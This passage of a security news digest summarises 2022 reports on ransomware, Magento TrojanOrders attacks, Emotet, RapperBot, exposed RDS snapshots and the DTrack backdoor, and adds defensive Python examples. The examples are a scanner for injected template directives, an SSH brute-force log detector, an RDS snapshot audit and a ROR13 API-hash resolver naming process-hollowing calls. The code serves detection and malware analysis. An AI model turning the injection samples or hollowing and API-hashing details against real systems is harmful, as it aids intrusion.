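    return [k for k in product((0, 1), repeat=len(KEY)) if correctness(k) == 1.0]
```

    In this toy the gate kinds are plainly visible in the netlist, so a foundry that reads the design can read the key off it; closing that gap, by making the key-dependent element indistinguishable in layout, is the whole point of schemes such as the MTJ-based lock in the article, and it is not modeled here. Note also that a wrong key does not fail on every input, which is why attacks on logic locking work from input/output observations rather than from the netlist alone.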

    KAUST Discovery reports "Hard to Crack Hardware"

  • news

    Visible to the public "Companies Caught off Guard by Holiday and Weekend Ransomware Attacks"

    Ransomware attackers are taking advantage of organizations having fewer security personnel available on weekends and holidays in order to launch more devastating attacks. According to a new Cybereason report, 44 percent of businesses reduce security staffing by up to 70 percent during holidays and weekends compared to weekday levels. Twenty-one percent cut staff by up to 90 percent. The study, which was based on a survey of over 1,200 cybersecurity professionals, discovered that attacks on weekends and holidays result in higher costs and revenue losses for organizations than attacks on weekdays. More than one-third of respondents who experienced a ransomware attack during the weekend or holiday report that their organizations lost more money, a 19 percent increase from 2021. Thirty-four percent of respondents whose organizations were attacked on a weekend or holiday say it took them longer to assemble their incident response team. Thirty-seven percent say it took them longer to assess the scope of the attack, and 36 percent say it took them longer to stop and recover from the attack. In the US, 44 percent of respondents said it took them longer to assess and respond to a weekend/holiday ransomware attack. The survey results show that traditional Monday through Friday staffing models are out of step with cyber threats and can leave organizations vulnerable. A ransomware attack has caused 88 percent of respondents to miss a holiday or weekend celebration. In addition, more than 90 percent of respondents in the financial services industry say they have missed out on family time. This article continues to discuss the impact of weekend/holiday ransomware attacks on companies.

    BetaNews reports "Companies Caught off Guard by Holiday and Weekend Ransomware Attacks"

  • news

    Visible to the public "Magento Stores Targeted in Massive Surge of TrojanOrders Attacks"

    At least seven hacking groups are responsible for a massive increase in 'TrojanOrders' attacks against Magento 2 websites, which exploit a vulnerability that allows threat actors to compromise vulnerable servers. Sansec, a website security firm, warned that the attacks are targeting nearly 40 percent of Magento 2 websites, with hacking groups fighting for control of an infected site. During a busy Black Friday and Cyber Monday period, these attacks are used to inject malicious JavaScript code into an online store's website, causing significant business disruption and massive customer credit card theft. The trend is expected to continue as we approach Christmas, when online retailers are at their most critical and vulnerable. The TrojanOrders attack exploits a critical Magento 2 vulnerability, tracked as CVE-2022-24086, which allows unauthenticated attackers to execute code and inject Remote Access Trojans (RATs) on unpatched websites. Adobe patched this flaw in February 2022, but Sansec says many Magento sites have remained unpatched. According to Sansec, at least a third of all Magento and Adobe Commerce stores have not yet been patched. Hackers typically create an account on the target website and place an order containing malicious template code in the name, VAT, or other fields when conducting TrojanOrders attacks. Once on the website, the attackers install a RAT to gain persistent access and the ability to perform more complex actions. This article continues to discuss findings regarding the increase in TrojanOrders attacks targeting Magento 2 websites.

    Bleeping Computer reports "Magento Stores Targeted in Massive Surge of TrojanOrders Attacks"
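
    Because the TrojanOrders technique places template code in customer-supplied order fields, a merchant can screen new orders, or audit stored ones, for the `{{directive ...}}` syntax that Magento's template filter interprets. The scanner below is an added example written for this page, not code from Sansec or Adobe; the order records, the field names, and the directive list are constructed and illustrative rather than exhaustive. It is a triage control, not a substitute for applying Adobe's February 2022 patch.

```python
"""Flag Magento template-directive syntax in customer-controlled order fields (added example)."""
import re
from typing import Dict, List, Tuple

# Magento template directives take the form {{var ...}}, {{block ...}}, {{if ...}} and so on.
DIRECTIVE_RE = re.compile(r"\{\{\s*([A-Za-z_]+)[^{}]*\}\}")

# Directive names a legitimate customer never types into a checkout form (non-exhaustive;
# any {{...}} in these fields is already suspicious, so unknown names are flagged too).
KNOWN_DIRECTIVES = {"var", "block", "if", "depend", "template", "trans", "config", "widget"}

# Fields the customer controls during checkout or account creation (assumed column names).
CUSTOMER_FIELDS = ("firstname", "lastname", "company", "vat_id", "street", "city", "telephone")


def scan_order(order: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (field, label, snippet) for every directive or brace fragment found."""
    findings = []
    for field in CUSTOMER_FIELDS:
        value = order.get(field) or ""
        matches = list(DIRECTIVE_RE.finditer(value))
        for m in matches:
            name = m.group(1).lower()
            label = name if name in KNOWN_DIRECTIVES else "unknown:" + name
            findings.append((field, label, m.group(0)[:80]))
        if not matches and ("{{" in value or "}}" in value):
            # Unbalanced braces do not form a directive but still merit a look.
            findings.append((field, "fragment", value[:80]))
    return findings


def triage(orders: List[Dict[str, str]]) -> List[str]:
    """Return the ids of orders whose customer fields contain template syntax."""
    return [o["order_id"] for o in orders if scan_order(o)]


# Constructed sample orders: one clean, one carrying directive syntax in three fields.
SAMPLE_ORDERS = [
    {"order_id": "100000001", "firstname": "Jane", "lastname": "O'Brien", "company": "",
     "vat_id": "DE123456789", "street": "12 Hauptstr.", "city": "Berlin", "telephone": "+49 30 1234"},
    {"order_id": "100000002", "firstname": "{{var order.increment_id}}", "lastname": "Smith",
     "company": "{{frobnicate 1}}", "vat_id": "GB999", "street": "{{ unclosed", "city": "Leeds",
     "telephone": ""},
]

if __name__ == "__main__":
    for order in SAMPLE_ORDERS:
        for field, label, snippet in scan_order(order):
            print(f"order {order['order_id']}: {field}: {label}: {snippet!r}")
    print("orders to review:", triage(SAMPLE_ORDERS))
```

    Run it against a dump of `customer_entity`, `sales_order_address` and similar tables, or wire `scan_order` into an order-placed observer; hits from the weeks before patching are the orders whose follow-on activity (new admin users, unexpected files under the web root) deserves an incident response check.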

  • news

    Visible to the public "Euro Authorities Warn World Cup Fans Over Qatari Apps"

    European privacy experts warn FIFA World Cup attendees that their personal data may be at risk if they download two local tracking apps. The two apps in question are the contact-tracing app Ehteraz, which football fans may be asked to download if they have to visit healthcare facilities during their stay in Qatar, and the official World Cup app Hayya. Hayya functions as a fan ID app that may be needed to gain entry into stadiums. However, concerns have been raised that it also tracks device location and network connections, even preventing devices from going into sleep mode. With 1.5 million fans expected to travel to the tiny Gulf state, several European governments have issued advice to mitigate privacy and security concerns. The German data protection agency, BfDI, said that "the data processing of both apps probably goes much further" than their descriptions in the app store indicate. Among other things, one of the apps collects data on whether, and with which number, a telephone call is made. This sometimes involves sensitive telecommunications connection data. Neil Jones, director of cybersecurity evangelism at Egnyte, argued that the data collected by the apps could also be a treasure trove for would-be cyber-criminals. Jones stated that if you plan to travel to the event, he strongly recommends the purchase of a burner phone if the privacy-limiting capabilities cannot be disabled.

    Infosecurity reports: "Euro Authorities Warn World Cup Fans Over Qatari Apps"

  • news

    Visible to the public "Hundreds of Thousands of Emotet Attacks Spotted Daily After Four-Month Hiatus"

    After a four-month hiatus, the cybercriminals running the Emotet botnet operation are once again among the most high-volume threat actors in the current cybersecurity landscape. According to Proofpoint, detections of Emotet payloads dropped off in July 2022 but reemerged in early November, and the botnet is now serving as a primary facilitator for the delivery of major malware strains. Emotet previously resumed operations in November 2021, less than a year after a law enforcement operation shut down its original infrastructure, which had been targeting businesses with malware for years. According to the company, it has been blocking hundreds of thousands of Emotet-related emails every day, making this one of the most extensive email threat campaigns. Following its historical patterns, Emotet demonstrated continued evolution in its behavior, including changes in lures, the malware's binary, and the other malware dropped through successful campaigns. Palo Alto Networks' Unit 42 team discovered that both the IcedID and Bumblebee malware strains were dropped onto a victim's machine in a single Emotet infection. The IcedID strain currently spreading via Emotet is a more recent version with different commands and a new loader, which could indicate a change in ownership or a new relationship between the criminals running IcedID and those behind Emotet. Since 2021, when it was observed distributing The Trick and Qbot, Emotet had not demonstrated full functionality with consistent delivery of follow-on payloads other than Cobalt Strike. The return of TA542, Proofpoint's designation for the Emotet operators, coinciding with the delivery of IcedID is concerning. IcedID has previously been identified as a follow-on payload to Emotet infections, often leading to ransomware. IcedID can retrieve desktop information, running processes, and system information, among other things. It can also use its command-and-control (C2) infrastructure to read and exfiltrate files. This article continues to discuss the impact of Emotet following its hiatus.

    ITPro reports "Hundreds of Thousands of Emotet Attacks Spotted Daily After Four-Month Hiatus"

  • news

    Visible to the public "LockBit Remains Most Prolific Ransomware in Q3"

    According to new research from Trellix, the infamous LockBit ransomware variant remained the most widespread in the third quarter of 2022, accounting for over a fifth (22%) of detections. The researchers noted that LockBit and Phobos were the most common ransomware families during Q3 2022. LockBit has been the most prolific variant of 2022 so far. The researchers noted that at the end of Q3, its "builder" was leaked, and allegedly various groups are already establishing their own ransomware-as-a-service (RaaS) operations with it. The researchers stated that Phobos ransomware continues to be active and accounts for 10% of the ransomware attacks they observed. Its operators' tactic of selling a complete ransomware kit and avoiding large organizations allows them to stay under the radar. The researchers noted that Germany recorded the highest detections of APT-related activity (29%) and the highest volume of ransomware (27%), while telecoms was the sector most impacted by ransomware, followed by transportation and shipping. The researchers claimed that the most active advanced threat groups during the quarter were the China-linked Mustang Panda, Russia's APT29, and Pakistan-linked APT36. The red team software Cobalt Strike remained a popular tool for threat actors, seen in a third (33%) of observed global ransomware activity and 18% of APT detections in Q3.

    Infosecurity reports: "LockBit Remains Most Prolific Ransomware in Q3"

  • news

    Visible to the public  "New RapperBot Campaign Targets Game Servers With DDoS Attacks"

    Fortinet FortiGuard Labs researchers discovered new RapperBot malware samples that are being used to build a Distributed Denial-of-Service (DDoS) botnet targeting game servers. The researchers first reported the previously undetected RapperBot Internet of Things (IoT) botnet in August and found that it has been active since mid-June 2022. The botnet takes a large portion of its code from the original Mirai botnet, but unlike other IoT malware families, it brute-forces credentials to gain access to Secure Shell (SSH) servers rather than Telnet, as Mirai does. Researchers have also noticed that the most recent samples include persistence code, which is rarely implemented in other Mirai variants. The credential list used for brute-forcing was hardcoded into earlier samples of the malware, but starting in July, the samples began retrieving the list from the command-and-control (C2) server. RapperBot has been using self-propagation to maintain remote access to the brute-forced SSH servers since mid-July. The most recent samples also include DDoS attacks against the Generic Routing Encapsulation (GRE) protocol, possibly using Mirai source code, and against the User Datagram Protocol (UDP) protocol used by a GTA game mod. The hardcoded credentials list consists of default credentials for IoT devices. The analysis of the malware's hardcoded prompt messages revealed that it primarily targets routers and DVRs. The most recent campaign targets older devices equipped with the Qualcomm MDM9625 chipset, such as LTE modems. Once inside a device, it sends the credentials used, the compromised device's IP address, and its architecture to the C2 server via a separate port, 5123. The malware then attempts to install the RapperBot payload binary on the infected device. This article continues to discuss the discovery of new RapperBot samples used to build a botnet to launch DDoS attacks against game servers.

    Security Affairs reports "New RapperBot Campaign Targets Game Servers With DDoS Attacks"
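
    A botnet that works through a list of default IoT credentials over SSH leaves a recognisable footprint on the target: many failed password attempts from one source across several usernames, sometimes followed by a successful password login. The detector below is an added example written for this page, not FortiGuard's tooling; the log lines are constructed in OpenSSH's `auth.log` format and the thresholds are assumptions to tune per environment.

```python
"""Flag SSH credential brute-forcing in sshd logs (added example, constructed log lines)."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Matches both "Failed password for invalid user admin from ..." and "Accepted publickey for alice from ...".
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

# Constructed sample: one source spraying default credentials at a DVR and getting in as
# root, and one legitimate user who mistyped a password once and then used a key.
SAMPLE_LOG = """\
Nov 15 03:12:01 dvr sshd[812]: Failed password for invalid user admin from 203.0.113.9 port 51234 ssh2
Nov 15 03:12:02 dvr sshd[813]: Failed password for invalid user support from 203.0.113.9 port 51235 ssh2
Nov 15 03:12:03 dvr sshd[814]: Failed password for root from 203.0.113.9 port 51236 ssh2
Nov 15 03:12:04 dvr sshd[815]: Failed password for root from 203.0.113.9 port 51237 ssh2
Nov 15 03:12:05 dvr sshd[816]: Failed password for invalid user user from 203.0.113.9 port 51238 ssh2
Nov 15 03:12:06 dvr sshd[817]: Accepted password for root from 203.0.113.9 port 51239 ssh2
Nov 15 03:20:11 dvr sshd[901]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Nov 15 03:20:15 dvr sshd[902]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""


def parse(lines: Iterable[str]) -> Iterable[Dict[str, str]]:
    """Yield one event dict per sshd authentication line; other lines are ignored."""
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            yield m.groupdict()


def detect(lines: Iterable[str], min_failures: int = 5, min_users: int = 3) -> List[Dict]:
    """Per source IP, count failures and distinct usernames; alert when both thresholds
    are met. A password login from the same source after its failures is reported as a
    likely compromise so it can be prioritised over plain noise."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "compromised": []})
    for ev in parse(lines):
        s = stats[ev["ip"]]
        if ev["result"] == "Failed":
            s["failures"] += 1
            s["users"].add(ev["user"])
        elif ev["method"] == "password" and s["failures"] > 0:
            s["compromised"].append(ev["user"])
    alerts = []
    for ip, s in sorted(stats.items()):
        if s["failures"] >= min_failures and len(s["users"]) >= min_users:
            alerts.append({"ip": ip, "failures": s["failures"],
                           "users": sorted(s["users"]), "compromised": s["compromised"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

    On the devices this botnet actually targets there is usually no log to read, so the practical control is on the device side: change the default credentials and, where the firmware allows it, set `PasswordAuthentication no` in `sshd_config` so the credential list has nothing to match. The detector is for the SSH servers behind them that would otherwise absorb the spray.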

  • news

    Visible to the public "Cloud Data Protection Trends You Need to Be Aware Of"

    Veeam Software has released its "Cloud Protection Trends Report 2023," which covers four key "as a Service" scenarios: Infrastructure-as-a-Service (IaaS), Platform-as-a-Service (PaaS), Software-as-a-Service (SaaS), and Backup and Disaster Recovery-as-a-Service (BaaS/DRaaS). According to the survey, businesses are becoming more aware of the need to protect their SaaS environments. For example, almost 90 percent of the Microsoft 365 customers surveyed use supplemental measures in addition to built-in recovery capabilities. Preparing for a quick recovery from cyber and ransomware attacks was the most frequently cited reason for this backup, with regulatory compliance coming in second. According to Danny Allan, CTO and SVP of Product Strategy at Veeam, the growing adoption of cloud-powered tools and services, accelerated by the shift to remote work and current hybrid work environments, has put a spotlight on hybrid IT and data protection strategies across industries. As cybersecurity threats grow, organizations must look beyond traditional backup services to develop a strategic approach that best meets their business needs and cloud strategy. The findings of the survey reveal that workloads continue to move fluidly from data centers to clouds and back again, as well as from one cloud to another, adding to the complexity of data protection strategy. The survey also finds that while modern IT enterprises have made significant advances in cloud and data protection, there is still work to be done. This article continues to discuss key findings from Veeam's Cloud Protection Trends Report 2023.

    Help Net Security reports "Cloud Data Protection Trends You Need to Be Aware Of"

  • news

    Visible to the public "Wipermania: Malware Remains a Potent Threat, 10 Years Since 'Shamoon'"

    More than ten years after the "Shamoon" virus rendered nearly 30,000 client and server systems at Saudi Aramco inoperable, destructive wiper malware remains a major threat to enterprise organizations. Max Kersten, a malware analyst at Trellix, recently examined more than 20 wiper families that threat actors have used in various attacks since the beginning of the year. Kersten's analysis included a comparison of the technical aspects of the various wipers, including their similarities and differences. The analysis covered wipers used extensively by threat actors against Ukrainian targets, particularly just before Russia invaded the country, as well as more generic wipers found in the wild. His research revealed that the evolution of wipers since Shamoon has been vastly different from that of other types of malware tools. The malware used by threat actors in espionage campaigns has become increasingly sophisticated and complex over time, whereas wipers have evolved very little, despite remaining as destructive as ever. Kersten believes that much of this is due to how and why threat actors use them. In contrast to spyware and other malware for targeted attacks and cyber espionage, adversaries have little incentive to develop new functionality for hiding wipers on a network once they have snuck them in in the first place. Wipers, by definition, work to erase or overwrite data on computers and are thus loud and visible once launched. This article continues to discuss findings from Kersten's in-depth analysis of system-destroying malware families.

    Dark Reading reports "Wipermania: Malware Remains a Potent Threat, 10 Years Since 'Shamoon'"

  • news

    Visible to the public "Researchers Discover Hundreds of Amazon RDS Instances Leaking Users' Personal Data"

    New research from Mitiga, a cloud incident response company, reveals that hundreds of databases on Amazon Relational Database Service (Amazon RDS) are exposing Personally Identifiable Information (PII). According to the researchers, this kind of PII leakage presents threat actors with a potential gold mine, either for extortionware/ransomware campaigns or for the reconnaissance stage of the cyber kill chain. Names, email addresses, phone numbers, dates of birth, marital status, information on rented cars, and even company logins are included in the leak. Amazon RDS lets users set up relational databases in the Amazon Web Services (AWS) cloud, and supports various database engines, including MariaDB, MySQL, Oracle, PostgreSQL, and SQL Server. The primary cause of the leaks is public RDS snapshots, a feature that creates a backup of the entire database environment running in the cloud and makes it accessible to all AWS accounts. According to Amazon's documentation, users must ensure that none of their private information is present in a snapshot before sharing it publicly. When a snapshot is made publicly available, all AWS accounts have the ability to copy it and use it to build database instances. The researchers discovered 810 snapshots that were publicly shared for varying lengths of time, ranging from a few hours to weeks, making them susceptible to abuse by malicious actors. The research was conducted from September 21, 2022, to October 20, 2022. Over 250 of the 810 snapshots were visible for 30 days or more, indicating that they were probably forgotten. This article continues to discuss the exposure of PII by hundreds of databases on Amazon RDS.

    THN reports "Researchers Discover Hundreds of Amazon RDS Instances Leaking Users' Personal Data"
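
    An RDS snapshot is public exactly when its `restore` attribute contains the value `all`, which is what the console's "Public" setting toggles, so a forgotten share is easy to find from the API. The audit below is an added example written for this page, not Mitiga's tooling. The first two functions are pure and run offline on the constructed API responses embedded in the block; the last two call boto3 (`describe_db_snapshots`, `describe_db_snapshot_attributes`, `modify_db_snapshot_attribute`) and need credentials. The account id, snapshot names and region are made up.

```python
"""Find and fix publicly shared RDS snapshots in an AWS account (added example)."""
from typing import Dict, List


def is_public(attrs_result: Dict) -> bool:
    """Evaluate one DBSnapshotAttributesResult: public iff 'restore' contains 'all'."""
    for attr in attrs_result.get("DBSnapshotAttributes", []):
        if attr.get("AttributeName") == "restore" and "all" in attr.get("AttributeValues", []):
            return True
    return False


def find_public(snapshot_attrs: List[Dict]) -> List[str]:
    """Return the identifiers of the public snapshots among a list of attribute results."""
    return [r["DBSnapshotIdentifier"] for r in snapshot_attrs if is_public(r)]


# Constructed responses in the shape boto3 returns under 'DBSnapshotAttributesResult':
# one public, one shared with a single (made-up) account, one not shared at all.
SAMPLE_ATTRS = [
    {"DBSnapshotIdentifier": "orders-db-2022-10-01",
     "DBSnapshotAttributes": [{"AttributeName": "restore", "AttributeValues": ["all"]}]},
    {"DBSnapshotIdentifier": "orders-db-2022-10-02",
     "DBSnapshotAttributes": [{"AttributeName": "restore", "AttributeValues": ["123456789012"]}]},
    {"DBSnapshotIdentifier": "orders-db-2022-10-03",
     "DBSnapshotAttributes": [{"AttributeName": "restore", "AttributeValues": []}]},
]


def audit_account(region: str = "us-east-1") -> List[str]:
    """Live check: walk this account's manual snapshots (only manual ones can be shared)
    and return the ones whose restore attribute is 'all'."""
    import boto3  # imported here so the offline functions above work without it
    rds = boto3.client("rds", region_name=region)
    results = []
    for page in rds.get_paginator("describe_db_snapshots").paginate(SnapshotType="manual"):
        for snap in page["DBSnapshots"]:
            resp = rds.describe_db_snapshot_attributes(
                DBSnapshotIdentifier=snap["DBSnapshotIdentifier"])
            results.append(resp["DBSnapshotAttributesResult"])
    return find_public(results)


def make_private(snapshot_id: str, region: str = "us-east-1") -> None:
    """Remediate: drop 'all' from the restore attribute so only this account can restore."""
    import boto3
    rds = boto3.client("rds", region_name=region)
    rds.modify_db_snapshot_attribute(DBSnapshotIdentifier=snapshot_id,
                                     AttributeName="restore", ValuesToRemove=["all"])


if __name__ == "__main__":
    print("public in constructed sample:", find_public(SAMPLE_ATTRS))
```

    Two caveats for real use: Aurora cluster snapshots have their own calls (`describe_db_cluster_snapshot_attributes` and `modify_db_cluster_snapshot_attribute`), and making a snapshot private does not undo copies already taken, so a snapshot that was public for any length of time should be treated as disclosed and the credentials inside it rotated. Run the audit per region; snapshots are regional.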

  • news

    Visible to the public "MC2 Researchers Present Six Papers at ACM Security Conference"

    Six papers from researchers affiliated with the Maryland Cybersecurity Center (MC2) were accepted for presentation at the 2022 Association for Computing Machinery Conference on Computer and Communications Security (ACM CCS). The annual conference gathers information security researchers, practitioners, developers, and users worldwide. According to Michelle Mazurek, associate professor of computer science and director of MC2, MC2 faculty, students, and postdocs have produced work on the web's certificate infrastructure, hardware security, secure software development, and more. One of the papers that received an honorable mention is "Hammurabi: A Framework for Pluggable, Logic-Based X.509 Certificate Validation Policies," which introduces a framework that decouples the certificate processing mechanism from the certificate validation policy. In this framework, the researchers show that they can express the complex policies of the Google Chrome and Mozilla Firefox web browsers. They confirm Hammurabi policies' accuracy by comparing their validation decisions to those of the browsers on over 10 million certificate chains derived from certificate transparency logs, as well as 100,000 synthetic chains. "When Frodo Flips: End-to-End Key Recovery on FrodoKEM via Rowhammer," the second honorable mention paper, examines defending post-quantum cryptography systems from active side-channel attacks. The researchers use Rowhammer to demonstrate the first end-to-end implementation of a successful key recovery attack against FrodoKEM, a quantum-resistant public key cryptographic algorithm. They begin by launching Rowhammer, a security exploit, in order to poison FrodoKEM's KeyGen process. Then, they use a supercomputer to extract private-key material and synthesize it with a customized key-recovery algorithm. On a standard laptop, any individual FrodoKEM-encrypted session key can then be recovered in about two minutes. This article continues to discuss papers developed by MC2 researchers that were accepted by the ACM security conference.

    UMIACS reports "MC2 Researchers Present Six Papers at ACM Security Conference"

  • news

    Visible to the public "Commercial Repair Shops Caught Snooping on Customer Data by Canny Canadian Research Crew"

    Computer scientists at the University of Guelph in Canada discovered that electronics repair services lack effective privacy protocols. In addition, the researchers found that technicians often snoop on customers' data. The team describes how they tested the privacy policies and practices of electronics repair shops in a four-part research study titled "No Privacy in the Electronics Repair Industry." The study included a field survey of 18 North American repair service providers, including three national, three regional, and five local providers, as well as two national smartphone repair service providers and five device manufacturers. Representatives from these companies were questioned about whether they have privacy policies and how they treat customer data. Then, repair personnel were asked to replace the batteries in Asus UX330U laptops running Microsoft Windows 10, a fix that should not require the use of login credentials or operating system access. However, all but one of the firms requested login information. According to the paper, none of the service providers posted any notice informing customers about their privacy policies. Similarly, no researcher was informed about a privacy policy, their rights as a customer, or how to protect their data until the devices were handed over. Only the three national and three regional service providers offered a terms and conditions document to be signed when the laptops were provided, and these agreements disclaimed liability for any data loss. After evaluating the privacy policies of these repair shops, the researchers put the technicians' actual privacy practices to the test by providing them with rigged Windows laptops loaded with dummy data that secretly recorded how the repair staff used the devices. The findings were not encouraging, as six of the sixteen technicians snooped on customers' data. Technicians copied customer data to external devices in two of the sixteen tests. One of the six snoopers tried to avoid generating evidence, while three took steps to conceal their activities. The device logs show that the offending technicians attempted to hide their tracks by deleting items from Microsoft Windows' "Quick Access" or "Recently Accessed Files" lists. This article continues to discuss findings from the study on electronics repair services' privacy policies and practices.

    The Register reports "Commercial Repair Shops Caught Snooping on Customer Data by Canny Canadian Research Crew"

  • news

    Visible to the public "Researchers Break Security Guarantees of TTE Networking Used in Spacecraft"

    Time-Triggered Ethernet (TTE) is an example of a mixed-criticality network that can route traffic with varying levels of timing and fault tolerance requirements over the same set of hardware. Previously, spacecraft relied on one network to transmit safety-critical or mission-critical messages and one or more completely separate networks to carry video conferencing and other types of less-critical traffic. Orion is the first spacecraft to use a TTE network to route mixed-criticality traffic, including for vital systems such as navigation and life support, for file transfers that are critical for delivery but not timing, and for non-critical tasks like crew video conferencing. TTE, which will also be used in NASA's Lunar Gateway space station and the European Space Agency's (ESA) Ariane 6 launcher, is critical for reducing the size, weight, cost, and power requirements of modern spacecraft. Safety-critical systems, such as those used for steering and engine control, typically require network messages to be sent and received at intervals as short as 40 to 50 milliseconds. If messages are delayed or dropped, there can be disastrous consequences. On the other end of the criticality spectrum are messages sent by scientific instruments, which are often commercial off-the-shelf devices provided by universities or outside researchers with minimal safety review from the National Aeronautics and Space Administration (NASA). While fully compatible with the Ethernet standard, TTE can also deliver the kind of messages that engineers normally reserve for special-purpose networks. TTE provides two key benefits not available in regular Ethernet to prevent less-important messages from interfering with critical ones. The first is a time-triggered paradigm in which all devices are tightly synchronized and send messages according to a set schedule. The second is fault tolerance: TTE replicates the entire network into multiple planes and forwards messages across all planes simultaneously. Researchers from the University of Michigan, the University of Pennsylvania, and NASA's Johnson Space Center recently published findings that breach TTE's isolation guarantees for the first time. PCspooF is an attack in which a single non-critical device connected to a single plane can disrupt synchronization and communication between TTE devices on all planes. The attack works through the exploitation of a flaw in the TTE protocol. This article continues to discuss TTE and the study that broke the security guarantees of TTE networking.

    Ars Technica reports "Researchers Break Security Guarantees of TTE Networking Used in Spacecraft"

  • news

    Visible to the public "FBI Director Say He's 'Extremely Concerned' About China's Ability to Weaponize TikTok"

    On Tuesday, during a House Homeland Security Committee hearing on worldwide threats, FBI Director Christopher Wray told Congress he is "extremely concerned" that Beijing could weaponize data collected through TikTok, the wildly popular app owned by the Chinese company ByteDance. Wray stated that application programming interfaces, or APIs, that ByteDance embeds in TikTok are a national security concern since Beijing could use them to "control data collection of millions of users or control the recommendation algorithm, which can be used for influence operations." Wray noted that while America faces cyber threats from various nations, "China's vast hacking program is the world's largest, and they have stolen more Americans' personal and business data than every other nation combined." Wray stated that APIs in TikTok could be harnessed by China to control software on millions of devices, meaning the Chinese government could conceivably technically compromise Americans' personal devices.

    CyberScoop reports: "FBI Director Say He's 'Extremely Concerned' About China's Ability to Weaponize TikTok"

  • news

    Visible to the public "Lazarus Backdoor DTrack Evolves to Target Europe and Latin America"

    According to researchers at Kaspersky, the DTrack backdoor, widely used by the North Korean Lazarus group over the last three years, is still being deployed to target organizations in Europe and the US. DTrack has been used to breach ATMs in financial environments, in ransomware attacks, and in campaigns against a nuclear power plant in India. The researchers stated that DTrack allows criminals to upload, download, start, or delete files on the victim host. Among the downloaded and executed files already found in the standard DTrack toolset, the researchers spotted a keylogger, a screenshot maker, and a module for gathering victims' system information. The researchers noted that with a toolset like this, criminals can implement lateral movement into the victims' infrastructure in order to, for example, retrieve compromising information. From a technical standpoint, the researchers said that DTrack had not changed substantially over time, but the threat actors behind it made some "interesting" modifications. The researchers stated that DTrack hides itself inside an executable that looks like a legitimate program, and there are several stages of decryption before the malware payload starts. After these stages, once the final payload is decrypted, it is loaded using process hollowing into the explorer.exe process. The researchers noted that in previous DTrack samples, the names of the libraries to be loaded were obfuscated strings. In more recent versions, the malware uses API hashing to load the proper libraries and functions. Another small change is that three C2 servers are used instead of six. Regarding targeted organizations, Kaspersky detected DTrack activity in Germany, Brazil, India, Mexico, Switzerland, Italy, Saudi Arabia, Turkey, and the US. Affected sectors include education, chemical manufacturing, governmental research and policy institutes, as well as IT service providers, utility providers, and telecommunications.

    Infosecurity reports: "Lazarus Backdoor DTrack Evolves to Target Europe and Latin America"
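
    API hashing removes readable import names such as "LoadLibraryA" from a sample, so an analyst recovers them by precomputing hashes of known export names and matching those against the constants found in the binary. The block below is an added example written for this page, not Kaspersky's code and not a claim about DTrack's own algorithm: ROR13 is used because it is the most common choice in commodity loaders, and the export names and the "constants pulled from a sample" are constructed for illustration (the set chosen is the API sequence process hollowing relies on, which is the loading technique the article describes).

```python
"""Resolve hashed Windows API names the way an analyst does (added example, ROR13 assumed)."""
from typing import Dict, Iterable, List, Optional

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def api_hash(name: str) -> int:
    """ROR13 hash over the ASCII bytes of an export name (no trailing NUL)."""
    h = 0
    for byte in name.encode("ascii"):
        h = ror32(h, 13)
        h = (h + byte) & MASK32
    return h


# Illustrative export names. In practice an analyst dumps the full export tables of
# kernel32, ntdll, ws2_32 and friends and hashes all of them.
WATCHED_APIS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAllocEx", "WriteProcessMemory",
    "CreateProcessA", "ResumeThread", "NtUnmapViewOfSection",
    "GetThreadContext", "SetThreadContext",
]


def build_table(names: Iterable[str]) -> Dict[int, str]:
    """Map hash -> export name, refusing to silently overwrite on a collision."""
    table: Dict[int, str] = {}
    for name in names:
        h = api_hash(name)
        if h in table and table[h] != name:
            raise ValueError(f"hash collision between {table[h]} and {name}")
        table[h] = name
    return table


def resolve(h: int, table: Dict[int, str]) -> Optional[str]:
    """Name for a hash constant, or None if it is not in the table."""
    return table.get(h)


def resolve_all(constants: List[int], table: Dict[int, str]) -> Dict[int, Optional[str]]:
    """Annotate every constant; unresolved ones are kept so the analyst can see the gaps."""
    return {c: resolve(c, table) for c in constants}


if __name__ == "__main__":
    table = build_table(WATCHED_APIS)
    # Constructed stand-in for constants extracted from a sample: the process-hollowing
    # API set plus one value that resolves to nothing.
    sample_constants = [api_hash(n) for n in ("CreateProcessA", "NtUnmapViewOfSection",
                                              "WriteProcessMemory", "SetThreadContext",
                                              "ResumeThread")] + [0xDEADBEEF]
    for c, name in resolve_all(sample_constants, table).items():
        print(f"0x{c:08x} -> {name}")
```

    When a sample's constants resolve to nothing, the hash routine is not ROR13 (or it folds the module name in, or hashes the NUL terminator as well); lift the routine from the sample's resolver loop and swap it in for `api_hash`. A resolved hollowing sequence such as the one above, together with the parent being a signed binary and the target being `explorer.exe`, is the kind of evidence that lets a detection rule fire on the loading technique rather than on a hash that changes with every build.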

  • news

    Visible to the public "GAO Tells DOD to Ensure Cyber Incidents are Properly Reported and Shared"

    According to a new Government Accountability Office (GAO) report, the Department of Defense (DOD) has not fully implemented its cyber incident management processes. The government watchdog also discovered flaws in data reporting and management. The DOD and the US Defense Industrial Base (DIB) rely heavily on information systems to carry out their missions. Malicious actors continue to target these systems, as the DOD has experienced more than 12,000 cyber incidents since 2015. Chinese hackers breached five US defense and technology firms in November and December 2021, obtaining passwords in order to gain access to the systems of the organizations and intercept sensitive communications. Hackers breached the Defense Information Systems Agency's (DISA) network between May and July 2019, potentially compromising personal information. Furthermore, in February 2017, an Iranian hacker group targeted DIB actors in a campaign to steal credentials and other data. The vast majority of cyber incidents reported are malicious logic incidents, which involve the installation of software designed and/or deployed by adversaries with malicious intentions in order to gain access to resources or information without the user's consent or knowledge. Other incidents include root-level intrusion, user-level intrusion, and Denial-of-Service (DoS) attacks. In order to combat the cyber threat, the DOD has established two incident management processes, one of which is for all incidents and one for critical incidents. The GAO acknowledged the efforts already made by the DOD and the DIB, which have resulted in a decrease in the number of incidents 